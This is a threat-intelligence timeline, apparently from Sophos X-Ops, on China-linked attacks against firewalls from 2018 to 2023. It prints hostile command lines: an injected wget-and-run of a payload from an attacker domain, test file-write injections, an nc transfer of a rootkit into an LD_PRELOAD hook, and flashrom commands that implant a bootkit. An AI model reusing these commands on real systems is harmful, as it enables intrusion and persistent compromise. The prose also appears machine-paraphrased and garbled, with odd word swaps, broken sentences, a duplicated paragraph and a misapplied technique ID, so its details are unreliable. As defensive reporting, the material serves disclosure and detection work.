As delineated in our overview article, Sophos has been actively countering various threat groups originating from China targeting perimeter devices such as Sophos firewalls. In this instance, we present a timeline outlining significant activities by these threat groups, alongside our coordinated responses and external reports attributing information and context.
Owing to the vast scope of the exposed activities, this is not an exhaustive review of all observed actions, nor does it encompass all Indicators of Compromise (IOCs). The purpose is to equip defenders with insights into crucial identified Techniques, Tactics, and Procedures (TTPs). The limited set of referenced IOCs are accessible in a machine-readable format and can be accessed here. Sophos X-Ops is open to collaboration with others and ready to share additional specific IOCs as needed. Please reach out to us via pacific_rim[@]sophos.com.
Important Note: This document refers to the MITRE ATT&CK® for Enterprise framework, version 15. Refer to the MITRE ATT&CK Tactics and Techniques section in this document for a breakdown of the threat actors’ actions mapped against MITRE ATT&CK tactics and techniques.
Table of Contents
The initial assault was not directed at a network device but rather the solitary recorded attack on a Sophos facility: the headquarters of Cyberoam, a subsidiary based in India.
December 2018: Deciphering a trail of attack
Sophos identified a low-privilege computer – one responsible for managing a display unit affixed to the wall of the Cyberoam office – carrying out network scans (MITRE ATT&CK technique T1046).
Upon preliminary examination of the device, typical living-off-the-land tools and standard malware for persistence and reconnaissance were detected, signifying a relatively unsophisticated actor. However, leveraging an SSH key found on the device, X-Ops recognized the initiation of an attack path employing TTPs indicative of a more persistent threat. These included:
- Substituting the SSH and SSHD daemon with versions deemed related to a malware strain known as Onderon, as identified by ESET in their report The Dark Side of the ForSSHe; this family is also referred to as bl0wsshd00r67p1 (T1554)
- Windows and Linux variants of the Gh0st remote access Trojan (RAT)
- An innovative (for 2018) strategy to transition from on-premises devices to cloud resources by exploiting an excessively permissive IAM setup associated with AWS SSM (T1078.004)
- Moreover, a previously undisclosed, extensive, and intricate rootkit (later publicly analyzed and named Cloud Snooper by Sophos) was deployed ( T1014)
Although this was the singular incident involving a direct assault on a Sophos facility, it highlighted an adaptable enemy capable of escalating capabilities as required to accomplish their goals. For instance, the threat actor displayed profound familiarity with AWS SSM (a relatively novel technology in 2018) and deployed a kernel-level rootkit with surreptitious command and control (C2) employing ATT&CK technique T1205.002.
Commencing in early 2020 and persisting through a significant portion of 2022, the adversaries invested substantial energy and assets in multiple offensives aimed at devices with public-facing web interfaces (T1190).
The two services under attack were a) a user interface mainly utilized for remote clients to download and configure a VPN client and b) an administrative interface for general device setup. These services, typically limited to LAN access, were increasingly made remotely accessible by device owners due to the rise in remote work during the COVID-19 pandemic.
In a swift succession of attacks, the adversary exploited a series of previously unknown vulnerabilities it had unearthed, then put into operation, targeting these web interfaces. The initial intrusion exploits granted the attacker code execution with limited privileges, which, combined with additional exploits and privilege escalation tactics (T1059.004, T1203), facilitated the installation of malware with root-level privileges on the device.
CVE-2020-12271 (Asnarök)
April 21, 2020: A notable proximity
A day prior to the Asnarök assaults, X-Ops received an external bug bounty report outlining a critical SQL injection (SQLi) flaw in the same platform targeted in the attacks. The reported vulnerability differed from the one employed in the attack, and the researcher had previously contributed to our program, leading to low confidence in any direct link to the attack. Nevertheless, given the suspicious timing of the report (day preceding the attack) and the researcher’s location: Chengdu, a Chinese city identified later as the hub of the tracked activities in this report, we include the submission here.
April 22, 2020: Detection of Asnarök attacks
Reports reached X-Ops regarding a peculiar value in the administrator-visible sfmipport database field. This anomaly manifested solely in a subset of devices with specific firmware versions, where a post-exploit automation flaw caused a cleanup process to fail.
Examination of an affected device revealed an SQLi vulnerability that Sophos would later assign as CVE 2020-12271. This vulnerability, combined with a command injection privilege escalation (T1059), enabled the attacker to obtain root access to the device and deploy the Asnarök Trojan (T1203). The Trojan was installed via the subsequent command injected into the database table:
||cd /tmp/ && wget https://sophosfirewallupdate[.]com/sp/install.sh -O /tmp/x.sh && sh /tmp/x.sh||
The Asnarök assault also marked the initial attempt to disrupt hotfixes on devices, with the threat actor implementing a script loop to consistently set the administrative setting to decline hotfixes (T1562.006).
April 23, 2020: Identification and mitigation of hotfixes
Sophos released an automatically implemented hotfix to address CVE 2020-12271, eliminate and eradicate identified malware, and (crucially) enhance the quantity and variety of data transmitted by firewalls.
The hotfix furnished X-Ops with broader visibility into maliciously altered devices. It remedied the CVE-2020-12271 vulnerability and terminated known malicious processes active on devices.
April 24, 2020: Focusing on ground zero
By correlating telemetry from the hotfixes with trial license registration data and web metrics, X-Ops analysts managed to construct a timeline of preparatory efforts for the attack.
Most notably, a single device exhibiting suspicious behavior since February 2020 was identified. Telemetry analysis indicated experimental command injection values inscribed in the sfmipport database field (used in the Asnarök attack). The device’s IP address traced back to Chengdu in the Sichuan province of China.
Bolstered by trial license data, multiple…linked to synonymized devices. Data from these gadgets demonstrated usage of terminal commands and activities that align with exploring vulnerabilities and developing exploits. Examples include inserting these scripts into the sfmipport field of the interface to evaluate the capability of writing files to the directory /tmp:
||touch /tmp/exploit.txt|| :443; echo xxx>/tmp/su1112;:443 :echo xxx>/tmp/su1112;:443
Connected profiles were also detected accessing Knowledge Base articles related to the structure of the gadgets.
The X-Ops unit leveraged additional pivoting in combination with OSINT analysis to determine with moderate confidence that the gadget belonged to Sichuan Silence Information Technology’s Double Helix Research Institute, situated in Sichuan, China.
April 23 – May 10, 2020: Toolset for moving forward
Upon reviewing the Asnarök breach, X-Ops crafted a specialized kernel implant to install on gadgets that Sophos had strong belief were under the control of groups engaged in malicious exploit exploration. This tool allowed for remote data and log retrieval without leaving any noticeable traces.
April 24 – 26 2020: Seizure of servers
X-Ops sought help from the National Cyber Security Centre of the Netherlands (NCSC-NL) to facilitate the confiscation of the server in the Netherlands hosting the domain ragnarokfromasgard[.]com, the primary C2 conduit used by the Asnarök malware. NCSC-NL acted as a go-between with the Dutch National High Tech Crime Unit. NHTCU swiftly filed for a warrant to take control of the server.
The X-Ops team also requested the US-based domain registrar to hand over management of the domain – as well as a few others registered by the same user and hosted on the same server – to Sophos.
Two days after initial contact, the warrant was sanctioned, and the primary C2 server was disconnected and scrutinized forensically by the NCSC-NL and the NHTCU.
Sophos X-Ops made our inquiry into the breach public, marking the first instance where our hardware was the subject of an investigation by the company. The post named the breach Asnarök (alluding to the domain name “ragnarokfromasgard.com” utilized during the breach).
April 28, 2020: Communication
Sophos commenced outreach to the minor segment of registered users who did not automatically receive the patches (namely, outdated gadgets and gadgets where administrators had disabled automatic patching).
May 3, 2020: Enhanced detection and response capabilities
X-Ops initiated collaboration with Sophos’ product engineering group to incorporate new broadened detection and response features into the firewall data collection process.
May 4, 2020: Control acquisition of domains
The domain registrar relinquished control of domains utilized by the Asnarök malware, plus other domains registered by the same user (none of which had ever been utilized for legitimate purposes), to Sophos. X-Ops redirected the domains to a sinkhole under Sophos’ control. This switch cut off the attacker’s C2 avenues, and the sinkhole provided Sophos with additional insights into compromised gadgets.
May 5, 2020: Evaluation of sinkhole
Reviewing the logs from the sinkhole requests uncovered numerous distinct User-Agents and requested URIs. In addition to anticipated requests from a limited number of unpatched and outdated Sophos gadgets, X-Ops pinpointed User-Agent strings and payload requests corresponding to consumer and SOHO routers from other manufacturers, as well as varied requests potentially linked to the Ragnarok ransomware (T1584.008).
May 20, 2020: Rectification
Sophos engineering introduced a patch to enforce password resets on potentially affected gadgets and implemented a login captcha to impede automation of credential-stuffing.
May 21, 2020: Detailed divulgence
Sophos X-Ops shared a subsequent blog unpacking fresh insights about the breach: The Asnarök threat actor altered the course of the breach twice while it was unfolding in April.
CVE-2020-15069 (Buffer overflow in Bookmark feature)
April 9, 2020: Preparations for Round 2
Just as attackers were gearing up to exploit CVE-2020-12271 in the Asnarök attacks, the development of another exploit was already in progress. Through retrospective threat tracking, on this date X-Ops flagged the inaugural sighting of what eventually became CVE-2020-15069.
Analyzing the device and other devices associated with the same source IP revealed features linked to a testing environment:
- Regular power cycling
- Reverting to prior firmware editions (indicative of restoring from a disk snapshot)
- Registration details using complimentary webmail services (in this situation, 163.com, a provider based in China)
- A multitude of devices (comprising physical and virtual ones), running diverse and frequently changing firmware versions
- A scarce number of devices linked via the LAN interface
- WAN interfaces with private IP addresses, hidden behind network address translation from another device (Huawei)
Tracing the serial numbers of the physical devices indicated that they were procured by an authorized partner and likely resold second-hand.
June 17, 2020: Kickoff of Round 2
On this day, 56 days after the commencement of the Asnarök attack, the threat actor began exploiting a zero-day buffer overflow vulnerability (CVE-2020-15069) in a custom Apache module. This exploit, combined with a local elevation of privileges, was utilized to deploy an indiscriminate malicious web shell to gadgets running a web portal facing the WAN (T1505.003).
June 18, 2020: Adversarial adaptability
Scrutiny of the attack and web shell unveiled major variations in attacker tactics, nullifying several defensive strategies employed during the Asnarök attacks:
- Lack of centralized C2
In Asnarök, X-Ops successfully took control of the C2 domains, effectively neutralizing the malware. The web shell did not communicate with external C2 servers for instructions; instead, it awaited inbound directives. - Simplicity
The Asnarök malware was extensive with considerable functionalities integrated directly, enabling X-Ops to decipher likely malicious intent. By utilizing a compact web shell providing command execution, the attackers managed to conceal their intent and maintain payloads on the server-side of systems not within X-Ops’ visibility.
- Stealth
The simplicity of the web shell diminished detection opportunities, as no extra active processes or permanence mechanisms were necessary. Moreover, to impede external detection, the web shell would respond with an HTTP 400 to any request lacking the correct password. X-Ops attempted unsuccessfully to crack the password hash stored directly in the web shell.
X-Ops promptly pinpointed the initial entry point and affected gadgets by leveraging the updated telemetry-collection capabilities integrated into gadgets post the Asnarök attacks. Furthermore, the telemetry aided in identifying a solitary, presumably attacker-controlled, patient-zero gadget where a version of this web shell had been deployed on April 9, prior to both the Asnarök attack and this attack.
June 24, 2020: Concealment of origin
Postmortem evaluation noted around 175 unique IP addresses that had been issuing commands to the infected appliances since June 17. All these IP addresses were part of an anonymizing network, obscuring the actual source of the attacks (T1090.003).
June 25, 2020: Cleanup
The product engineering teamunveiled a set of hotfixes, both aimed at fixing the CVE-2020-15069 vulnerability that allows code execution and eradicating the malware that was planted on the gadgets. Not only did the hotfixes eliminate the alterations made by the intruder that disabled the products from receiving hotfixes.
Extracting final value on February 18, 2021
Following a period of twelve weeks without incidents, X-Ops discovered renewed movements targeting unpatched and outdated devices, utilizing the CVE-2020-15069 vulnerability. The payloads siphoned off the credentials stored on the appliance and introduced a backdoor.
This onslaught presented distinct payloads compared to previous attacks – two Linux shell scripts known as patch.sh and IC.sh (T1059).
The IC.sh script confiscated local user account data from the device and transmitted it to an IP address owned by a Hong Kong-based ISP. It also secured an encoded replica of patch.sh, which it inscribed into the filesystem. It altered a setting in a database that deactivated automatic hotfix updates, recurrently executing the command every five minutes (T1562.001). Interestingly, the location where the attacker positioned IC.sh happened to be the same filesystem path utilized for malevolent scripts during the April 2020 Asnarök onslaughts. The antagonist also subverted the hotfixing mechanism, a behavior initially noticed during the June 2020 Bookmark Buffer Overflow strikes.
The patch.sh script executed hourly and made attempts to erase any traces that could indicate the device’s compromise left in a database.
This offensive also stood out in the sense that the assailants engaged directly with the telemetry system, aiming to cloak their actions and as a countermeasure against the telemetry enhancements implemented in the previous April post the Asnarök incident.
June 30, 2020 – Verification of Telemetry
Employing additional telemetry gathering, exploration of threats revealed a device exhibiting suspicious command executions. Assessment identified several atypical elements including masscan (a network port scanner) and a basic RAT. Further scrutiny pinpointed an additional 21 affected devices. It was established that in all instances, the initial access resulted from weak SSH credentials (T1110.001). While X-Ops deduced that the attack was likely isolated and disconnected from the larger and more sophisticated offensives, it did, however, demonstrate the efficacy of additional telemetry and threat-hunting procedures.
July 9, 2020: Initial Implant Deployment
Delving into the telemetry data, X-Ops analysts identified a device that they confidently attributed to the Double Helix entity. After consulting with legal advisors, X-Ops rolled out the targeted implant and witnessed the perpetrator using vim to compose and execute a modest Perl script. Despite its limited utility, the deployment showcased the competence of intelligence collection by granting almost real-time monitoring of devices controlled by the assailant.
July 14, 2020: First Encounter with TStark
During the pursuit for the earliest devices subjected to the bookmark buffer overflow exploit, X-Ops came across a threat actor internally dubbed as “TStark,” alongside a grouping of devices registered under the threat actor (utilizing a Proton Mail email address initiating with “TStark”).
The TStark set of devices encompassed some of the primary instances of malevolent payloads linked to the bookmark buffer overflow attack targeting CVE-2020-15069 (T1203). Furthermore, the devices displayed peculiar telemetry behavior hinting at intermittent VPN usage, with the telemetry sources swiftly oscillating between IP addresses geolocating to Hong Kong, then Chengdu, and back to Hong Kong (T1133).
X-Ops established that one of the tangible devices subsequently registered under the TStark persona had previously been registered by a former scholar at the University of Electronic Science and Technology of China (UESTC) in Chengdu.
July 27, 2020: Yield
Following refinements in methodologies to pinpoint assailant devices, X-Ops deployed the targeted implant to a set of devices linked with the Double Helix entity.
The additional visibility swiftly enabled X-Ops to expose a formerly uncharted and surreptitious remote code execution exploit. Unlike previous exploits necessitating chaining with privilege escalation maneuvers altering database values (a perilous and conspicuous operation that facilitated detection), this exploit left minimal traces and bestowed direct access to root. Below is a glimpse of the command-line activities that led to the revelation of the emerging zero-day exploit under development:
gdb -p 2951 ls ls ls -lsa nopcode -d -n nosync -t json -b … (truncated for brevity) … ls rm zz77 ls
Leveraging the implant’s capabilities to fetch data concerning the exploit, X-Ops identified a command injection vulnerability through the X-Forwarded-For http header in a brute-force detection component. Subsequently, they managed to replicate the exploit and collaborated with engineering teams to implement a fix.
July 28, 2020: Impact Evaluation
Exploration for threats discovered that two devices – one utilized by a legal firm, the other by an IT services organization – had been subjected to the exploit.
X-Ops ascertained that both devices established a reverse shell connection with the same IP address (belonging to a US-based hosting agency) (T1059).
July 30, 2020: Concealed Hotfixing
Sophos dispatched a patch to all vulnerable devices, encompassing the two compromised devices identified three days prior. Leveraging prior web-analytics scrutiny, X-Ops were cognizant of attackers monitoring the Sophos knowledge base (KB) articles linked with hotfixes and patches, compelling them to disguise the fix. Sophos engineers formulated the patch to address various inconsequential low-severity problems to mask a critical emergent capability.
August 9-13, 2020: Added Intelligence from Implants
X-Ops spotted additional suspicious activities on monitored devices, involving binaries in /tmp establishing connections with external IP addresses on ports 4438 and 4439.
Subsequent analysis uncovered a lower-severity post-authentication remote code execution vulnerability in an operating system component (T1210). X-Ops initiated efforts on a fix to rectify the vulnerability.
August 13 -14, 2020: Rootkit #2: A thwarted advancement in stealth
Whilst delving into the analysis of the Bookmark Buffer Overflow onslaught, X-Ops managed to access a unique malware sample directly from a device registered under “TStark.”
The sample, acknowledged as libxselinux.so, constituted a bespoke userland rootkit derived from code initially attributed to the Winnti threat actor group (T1014).
The malware comprised two components: a central engine for communication with a command-and-control server, and a userland rootkit module that inspects devices on the local system during startup then triggers the central module (T1547).
Retrospective probing failed to uncover any other instances of libxselinux.so beyond the solitary TStark device. To deter any prospective future exploitation, Sophos proactively disseminated a patch to all precarious devices, integrating the two compromised devices discovered three days previously. Due to prior web-analytics scrutiny, X-Ops were cognizant that assailants were keeping an eye on the Sophos knowledge base (KB) articles related to hotfixes and patches, necessitating the concealment of the fix. Encompassing prior unrelated low-severity issues, the patch engineered by Sophos served to veil a pivotal emerging capability.
Subsequent evaluations post-patch elucidated the ineffectiveness of the attack, cementing the efficacy of the rapid response executed by X-Ops and Sophos.
implemented security measures to identify and prevent the rootkit (classified as Linux/Winnti-T).
August 21, 2020: TStark’s Readiness
X-Ops managed to acquire several data units from a TStark gadget. Amongst the data units obtained from the malicious actor were software created to operate on Mac OS X and iOS, along with IFRAME injection script exploiting a flaw in WebAssembly (wasm) (T1189).
August 31 – October 31, 2020: Targets in Tibet and Third Rootkit
In partnership with Volexity, Sophos aided an institution offering assistance to Tibetan exiles. Examination of the impacted device unveiled IOC correlation with the “TStark” threat actor tools (recognized just a mere 10 days earlier) and a faction Volexity nicknamed Evil Eye (and credited to “multiple Chinese APT actors”).
Researchers at Volexity also distributed examples of a rootkit they came across on the aforementioned gadget. X-Ops analysts concluded the data units were part of a loadable kernel module (LKM) rootkit titled Suterusu, accessible from a GitHub repository (T1014). The Suterusu payload was compiled with all elective features excluded, hence the functionality was confined to the 18 commandments denoted in the README document.
November 27, 2020: Easy Targets
The Cyberoam selection of products, a dated product series nearing obsolescence at that time, came under assault around two years after the assault on Cyberoam’s former establishments in India.
The adversary exploited a zero-day which later transpired into CVE-2020-29574 to establish a new user account with administrator privileges, labeled “cybersupport,” on impacted gadgets (T1136.001).
Sophos deployed an instant fix to mend the loophole and eliminate intruder-initiated accounts. The corporation reached out to registered owners advising them either to upgrade their gadgets or discontinue their usage entirely.
July 21, 2021: ANSSI Crediting
Eight months post the November 2020 SQL injection assault on Cyberoam appliances, the French government’s cybersecurity body, ANSSI, publicly accounted the Cyberoam account creation assault to the China-based threat entity APT-31.
The ANSSI declaration revealed that impacted Cyberoam devices were exploited by threat actors as an intermediary or proxy to launch assaults on other gadgets, such as Ivanti remote access gateways. An APT strategy that is now prevalent, utilizing the impacted gadgets in this manner aided the assailant in masking the genuine source of the assaults against the other targeted gadgets.
Commencing from 2021, the enemies seemed to shift their concentration from widespread indiscriminate assaults to highly specific, “hands-on-keyboard” narrow-focused assaults against unique entities: governmental agencies, vital infrastructure, research and development institutions, healthcare providers, retail, finance, military, and governmental institutions primarily in the Asia-Pacific region.
CVE-2022-1040 (“Personal Panda”)
March 21, 2022: A Dual Involvement?
For the second instance, Sophos received a bug bounty report concurrently very valuable yet dubious. An anonymous security researcher disclosed a zero-day to the Sophos bug bounty program; it was labeled as CVE-2022-1040. The researcher, who opted for no acknowledgment, alleged to be located in Japan, however, the IP address of the device they were utilizing was geographically traced back to China. They were remunerated with a $20,000 bounty.
The report contained two distinct vulnerabilities: an authentication circumvention defect in SFOS, and a command injection defect in OpenSSL that the researcher utilized for privilege escalation to attain a root shell.
March 23, 2022: A Swift Correction
Sophos introduced an instant fix to address the issue.
March 24, 2022: Analysis of Victims
Through retrospective investigations, X-Ops identified active exploitation of CVE-2022-1040 before the bug bounty submission. Though its prevalence was limited, victimology and timing demonstrated a targeting pattern aligning with PRC-based foreign policy objectives, particularly focusing on:
- A governmental department of high stature during a critical phase of BRI-related debt negotiations
- The same target related to Tibet attacked in August 2020
March 25, 2022: Revelation
Sophos issued the CVE-2022-1040 advisory.
March 26 – April 7, 2022: Rootkit #4
X-Ops’ continuous hunting for threats, outreach to affected entities, and scrutiny of impacted gadgets unveiled a multifaceted scenario of post-exploitation tools and TTPs consistent with manual targeting and distribution.
Sophos disclosed a segment of their findings in July 2022.
In addition to previously revealed components, X-Ops also discovered an additional set of activities linked to CVE-2022-1040 centered around a distinctive and custom-made rootkit, libsophos.so (T1014).
X-Ops identified two instances of libsophos.so, both deployed using CVE-2022-1040 – one on a governmental gadget and the other on a technological partner to the same governmental department.
Operational alongside a version of Gh0st RAT, libsophos.so during examination unveiled a uniquely crafted, fully equipped userland rootkit emulating Sophos product file naming trends and behavior (T1036).
X-Ops analysis unveiled that the libsophos.so library could infuse itself into the system’s SSH daemon (SSHD) by leveraging the LD_PRELOAD environment variable. This allowed the library to load prior to other system libraries, effectively inserting itself into the SSHD operation and modifying its behavior. Notably, it introduced the capability to monitor and respond to specifically crafted ICMP packets, which, upon reception by an affected gadget, would initiate a SOCKS proxy or a reverse shell back-connection to an IP address favored by the attacker (T1090, T1059). This was reminiscent of the December 2018 Cloud Snooper attack, that utilized the same methodology.
X-Ops successfully associated the development of libsophos.so with the TStark actor in hindsight. On February 18, 2022, shell history on two gadgets linked to TStark (1 physical, 1 virtual) showcased the actor renaming and running libsophos.so (also known as libgoat.so) on their gadgets, in addition to testing persistence:
rm -f /lib/libsophos.so nc 192.168.1.85 4444 > /lib/libsophos.so mv /tmp/server_x32 /lib/libsophos.so sed -e 's/exec /bin/dropbear/export LD_PRELOAD=libsophos.so chmod +x /bin/killlibgoat mv /tmp/goatserver_x64 /etc/libgoat.so killall libgoat.so
An iteration of libsophos.so observed on the assailants’ gadgets shared an identical hash (c71cd27efcdb8c44ab8c29d51f033a22) as spotted on the victim gadgets.
One of the gadgets also contained copies of valgrind and prex, tools frequently utilized for debugging and control flow tracing. The email address linked to the administrator account on this gadget was publicly tied to a Chinese offensive-security researcher and Linux shellcode expert.
April 2, 2022: OpenSSL Discoveries
Sophos unveiled the OpenSSL flaw on April 2; the vulnerability was designated the identifier CVE-2022-1292.
April 7, 2022: Concealment in JARs
Sustained analysis exposed a novel persistence TTP – Trojanized
May 2022: libsophos resurfaces
A search revealed a third device harboring the libsophos.so rootkit (T1014). This device was located in a military hospital in a distinct Asian nation compared to the initial targets.
May 3, 2022: Resolution for OpenSSL
OpenSSL introduced a resolution for CVE-2022-1292.
June 16, 2022: Sliver Discovery
Following the acquisition of additional Indicators of Compromise (IOCs) through collaboration with Volexity (who would later document this as DriftingCloud), X-Ops initiated further searches looking for communications with the C2 IP 192.248.152.58.
This search unveiled a single device, owned by a healthcare technology provider, operating a malware instance known as libiculxg.so. Subsequent X-Ops analysis confirmed libiculxg.so’s association with the versatile adversary emulation framework “Sliver.”
October 19-29, 2022: Revelations at Conferences
Sophos X-Ops presented a paper (“Your Own Personal Panda”) detailing our investigation into the CVE-2022-1040 assault and its malicious payloads at three conferences: Virus Bulletin, BruCON, and Saintcon.
Concealed Pathways (CVE-2022-3236)
September 16, 2022: Oversight Lapse Offers a Clue
In collaboration with Microsoft’s Incident Response unit, X-Ops uncovered a compromised device owned by a significant Asian financial services provider. Examination of the device divulged the initial occurrence of a series of activities that Sophos subsequently revealed as the Concealed Pathways.
Particularly noteworthy were two emerging Techniques, Tactics, and Procedures (TTPs) (affecting a limited number of compromised devices):
-
- A refinement of the backdoored JAR method employed in the Personal Panda assaults to intercept credentials processed by the device’s web interface
- Utilization of intercepted credentials to conduct a DCSync credential retrieval from a LAN-based domain-controller (T1003.006)
X-Ops initiated a telemetric pursuit for other devices featuring the identified compromised JAR document. This pursuit pinpointed a small grouping of devices with akin victim profiles as those observed in the Personal Panda attacks. Initial analysis of the impacted devices exposed activities indicative of manual selection and deployment: variations in file denominations and access rights, and notably, inconsistencies in log erasure practices.
September 17, 2022: Discovery of Initial Entry
Scrutiny of a tomcat log, on a device left incompletely cleaned by the attackers, led to the revelation of the primary entry point – a command injection vulnerability within a Perl-driven module. This vulnerability was later classified as CVE-2022-3236. Further assessment unearthed a correlated telemetric artifact consistently identifying successful exploitation. Exploration of this new indicator unveiled that the Java-based Trojan was solely deployed to a subsection of targeted devices. The predominant persistence technique, common across all devices, was the compromised Perl component (for more details on this and other malware prevalent in this assault, refer to our Concealed Pathways document).
September 21, 2022: Mitigation and Communication
Sophos initiated the deployment of a prompt fix to rectify the CVE-2022-3236 vulnerability and eliminate any supplementary malware dispatched to compromised devices.
Outreach efforts to affected device proprietors commenced. Similar to prior observed activities, victims were predominantly (but not exclusively) situated in Asia, with a specific concentration on military and state security units in a Southeast Asian state. In that same region, X-Ops also detected targeting of a few crucial infrastructure providers, including water supply systems and electricity generation facilities. Given the presumed limited intelligence acquisition worth by targeting these entities, X-Ops, with a moderate level of confidence, speculated that the attacking group might be gearing up for disruptive operations.
September 23, 2022: Public Declaration
Sophos officially released an advisory on the CVE-2022-3236 exploits.
October 9, 2022: Indicators of Compromise
Sophos made available further IOCs.
June 1, 2023: Exploitation of Concealed Pathways
X-Ops noted threat actors scanning for and exploiting CVE-2022-3236, primarily on outdated End of Life (EOL) unpatched devices. Reverting to observed Tactics, Techniques, and Procedures (TTPs) from 2020, the targeting seemed indiscriminate, likely aimed at establishing operational relays for forthcoming assaults. These assaults consistently employed the previously witnessed JAR-based persistence methods, showing a uniformity that hints at automated exploitation. The identified Command and Control (C2) channels were traced to an ISP based in Hong Kong (IPTelecom Asia).
June 13, 2023: Aid Endeavors
Sophos renewed their efforts to assist entities operating outdated EOL devices to transition to supported firmware versions.
November 27, 2023: Evasion of Patch
Routine X-Ops threat tracking revealed suspicious activity on a device that had received the CVE-2022-3236 patch. Further scrutiny confirmed the presence of malicious JAR documents and a link to a C2 IP (T1406). Tracking from the C2 exposed a limited number of devices – all patched for CVE-2022-3236 – displaying log artifacts implying effective exploitation of CVE-2022-3236.
November 28, 2023: An Aberrant Circumvention
Log scrutiny by X-Ops unveiled an unusual exemption coinciding with the moment of the exploit. Examination of the source code pinpointed a circumvention to the CVE-2022-3236 patch on devices running older firmware versions. By furnishing malformed JSON, the attackers managed to provoke an exemption, bypassing the supplementary input sanitization that mitigated CVE-2022-3236’s effects. This bypass was hindered on newer firmware versions by additional code strengthening measures, limiting its viability.
On the same day, X-Ops received intelligence from a non-Asian governmental collaborator concerning ongoing scanning of vulnerable devices in their jurisdiction. This is significant as the predominant CVE-2022-3236 activities observed thus far had been predominantly focused on Southeast Asian targets.
November 29 – December 11, 2023: Mitigation for Bypass
Sophos engineering distributed phased hotfixes to address the bypass. To broaden coverage, the patch was retrofitted onto several out-of-support but broadly deployed firmware versions.
December 11, 2023: Outreaching and Attribution
Sophos commenced outreach to the limited entities affected by the bypass. Though X-Ops registered minimal exploitation of this bypass, the characteristics of the victims were distinctive: In contrast to prior targeted strikes, victims were primarily governmental entities not situated in Southeast or South Asian regions. The arsenal of post-exploitation tools deployed was relatively mundane (mostly variations of known open-source tools, such as zscan, fscan, andChisel tool proved to be markedly distinct from previous attacks. Similarly, the identified C2 IPs (all associated with Cloudflare and RackNerd) were all geographically traced back to non-Asian nations (in contrast to previous instances where most C2 IPs were linked to Asian hosting providers).
These disparities prompted X-Ops to confidently determine that the evasive maneuver was orchestrated by a divergent faction. However, the targets remained aligned with the foreign policy objectives of the People’s Republic of China; notably, an embassy fell victim to the maneuver shortly before hosting senior officials of the Chinese Communist Party Politburo.
Subtle under-the-radar activities
Subsequent to the Covert Channels offensive, the adversary endeavored to evade detection by engaging in limited-scale deployment of existing exploits against specific targets and bolstering operational security measures, both during assault undertakings and when engaging in research and analysis on their own devices.
These onslaughts predominantly focused on critical installations where administrators displayed laxity in maintaining up-to-date firmware versions, hence missing out on patches for known vulnerabilities.
July 2022 – February 2023: A display of simplicity
X-Ops played a supportive role in an incident at a nuclear regulatory agency in collaboration with the national security and intelligence services of the country in question.
Regular monitoring detected a device downloading suspicious binaries from an internal LAN-side web server (T1105). X-Ops promptly alerted the affected entity and sought additional insights.
With the assistance of a domestic governmental agency, X-Ops secured malware samples from the device, revealing the presence of a RAT alongside open-source utilities. The RAT functioned as a straightforward back-connect shell activated upon receipt of a specially crafted packet by the device (T1205), a behavior previously observed by X-Ops in both the Cloud Snooper and Personal Panda assaults. Analysts struggled to pinpoint the C2 IP address of the back-connect due to it being encoded in the crafted packet rather than stored locally.
The arsenal of open-source tools deployed included Fast Reverse Proxy (FRP) and sbd, a secure netcat clone equipped with robust encryption (T1090). CISA later issued a bulletin regarding the exploits of the threat group Volt Typhoon leveraging FRP, yet X-Ops found no conclusive evidence directly tying these attacks to Volt Typhoon.
For establishing persistence, the attacker renamed a legitimate device binary “nasm” as “nasmd” and planted the RAT in its place. The system was already configured to execute “nasm” upon booting. Upon execution, the RAT spawned the original nasm binary to evade detection of any operational disruption.
A subsequent hunt for similar malware unearthed devices with a comparable assortment of payloads to those discovered at the nuclear energy regulatory agency, situated at a military command facility and the national capital’s airport in the same country.
Similar to the tactics deployed three years earlier in the CVE-2020-15069 offensives, the attack was noteworthy for its simplicity and skillful execution. Furthermore, this marked the first time X-Ops observed an attack likely originating from the LAN side of the device. X-Ops also stumbled upon log entries which suggested the attackers leveraged valid credentials to activate their tools, and observed tool downloads originating from an RFC1918 IP address (T1078).
August 15, 2022: Transition from rootkits to bootkits
An unfamiliar file surfaced on a bare-metal device previously flagged as suspicious by X-Ops and monitored as part of their targeted surveillance initiative. A review of the command-line history unveiled modifications being made to the device’s firmware:
ftpget -u admin -p password 10.10.10[.]110 ./flashrom ./flashrom
ftpget -u admin -p password 10.10.10[.]110 xg210-remove-dxe-guard-bds-infected.bin xg210-remove-dxe-guard-bds-infected.bin
chmod 777 flashrom { dd bs=392446464 skip=1 count=1; cat; } < /dev/sda > ./ext4_1_19.img
./flashrom -p internal -c "Opaque flash chip"
./flashrom -p internal -c "Opaque flash chip" -r xg210-read.bin
./flashrom -p internal -c "Opaque flash chip" -w xg210-remove-dxe-guard.bin
X-Ops managed to obtain a copy of a file “/bin/XG210-rkloadtest.bin” and identified an early-stage iteration of a UEFI BIOS bootkit based on VectorEDK.
The device housing the bootkit malware was registered to a company bearing an association with Guangzhou, yet it had been procured by a Chengdu-based firm, with telemetry being transmitted from an IP address pinpointed to Chengdu.
Despite deploying additional detection mechanisms, X-Ops had yet to catch sight of this capability being unleashed in the wild.
March 23 – April 19, 2023: Targeting the supply chain
Routine threat excursions by X-Ops uncovered dubious files running in-memory (and eradicated on disk) on a device operated by a government-affiliated technology supplier serving several strategic sectors.
X-Ops managed to secure a sample from the affected device and, tracing from the C2 domain, zeroed in on another impacted device owned by the same entity. A broader examination encompassing all devices associated with the affected entity unveiled a considerable surge in activity, with all but one device tied to the same entity (the exceptional one belonging to a government-controlled telecommunication entity).
The retrieved samples comprised:
- The port-mapping tool LCX
- Microsocks, a portable SOCKS5 server bundled with a hardcoded password of “Pa55W0rd”
- A sophisticated 64bit ELF backdoor with unclear origins, adept at sniffing user and admin credentials submitted into the device. Given the devices’ domain-joined nature, this likely precipitated the pilferage of privileged internal Active Directory credentials (T1649)
- A Go binary obfuscated utilizing the relatively obscure “go-strip” tool. The binary accepted a DES-encrypted configuration as a parameter, connecting to a specified C2 server to furnish command execution and file transfer capabilities upon execution
The operative’s utilization of Go and Python illustrated a refinement in tooling compared to previous observed incidents.
May 17-19, 2023: Persistent firmware upgrade strategy
Amid routine threat hunting, X-Ops stumbled upon a remote shell on a solitary device under the ownership of a government intelligence agency.
While the remote shell presented nothing out of the ordinary, X-Ops identified a persistence method hitherto unseen. Leveraging the open-source tool plthook, the adversaries implanted a hook into the firmware upgrade process (T1037.002). This hook inscribed the backdoor into the temporary partition designated for the new firmware before the device rebooted, guaranteeing its survival through firmware upgrades (although recovery was viable by flashing the firmware using an external USB drive).
To circumvent integrity checks, the attackers swapped out the binaries responsible for verifying the cryptographic signature in the firmware (T1027.001).
